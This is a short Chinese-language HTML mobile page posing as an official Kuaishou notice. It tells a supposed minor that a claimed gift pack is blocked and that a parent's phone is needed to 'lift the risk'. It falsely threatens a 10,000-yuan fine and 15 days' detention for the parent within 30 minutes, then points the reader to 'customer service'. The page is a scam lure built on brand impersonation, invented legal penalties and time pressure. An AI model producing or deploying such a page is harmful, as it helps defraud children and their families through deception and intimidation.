<!DOCTYPE html>
<html>
<head>
    <title>手机HTML页面</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }
        
        .app-icon {
            margin-top: 20px;
            height: 100px;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        
        .app-icon img {
            max-width: 100%;
            max-height: 100%;
            object-fit: contain;
            display: block;
            margin: auto;
        }
        
        .notification {
		    margin-top: 20px;
            font-weight: bold;
            font-size: 25px;
            text-decoration: underline;
        }
        
        .content {
            margin-top: 20px;
			font-size: 20px;
		    font-weight: bold;
        }
        
        .footer {
            margin-top: 60px;
            font-size: 20px;
			font-weight: bold;
        }
    </style>
</head>
<body>
    <div class="app-icon">
        <img src="https://cdnjson.com/images/2023/07/17/IMG_5653.jpg" alt="App图标">
    </div>
    <div class="notification">
        快手官方通知
    </div>
    <div class="content">
        <p>系统提示：尊敬的玩家您已成功领取福利礼包，根据微信实名认证信息，你属手未成年用户，为保护未成年人权益，未成年不能直接领取礼包，需要家长的手机辅助解除风险
		<br>(注：30分钟后.如果还没辅助解除风险，家长将会面临10000元的罚款和15日的拘留）</p>
    </div>
    <div class="footer">
        证明途径：请联系您当前所在客户进行处理！
    </div>
</body>
</html>
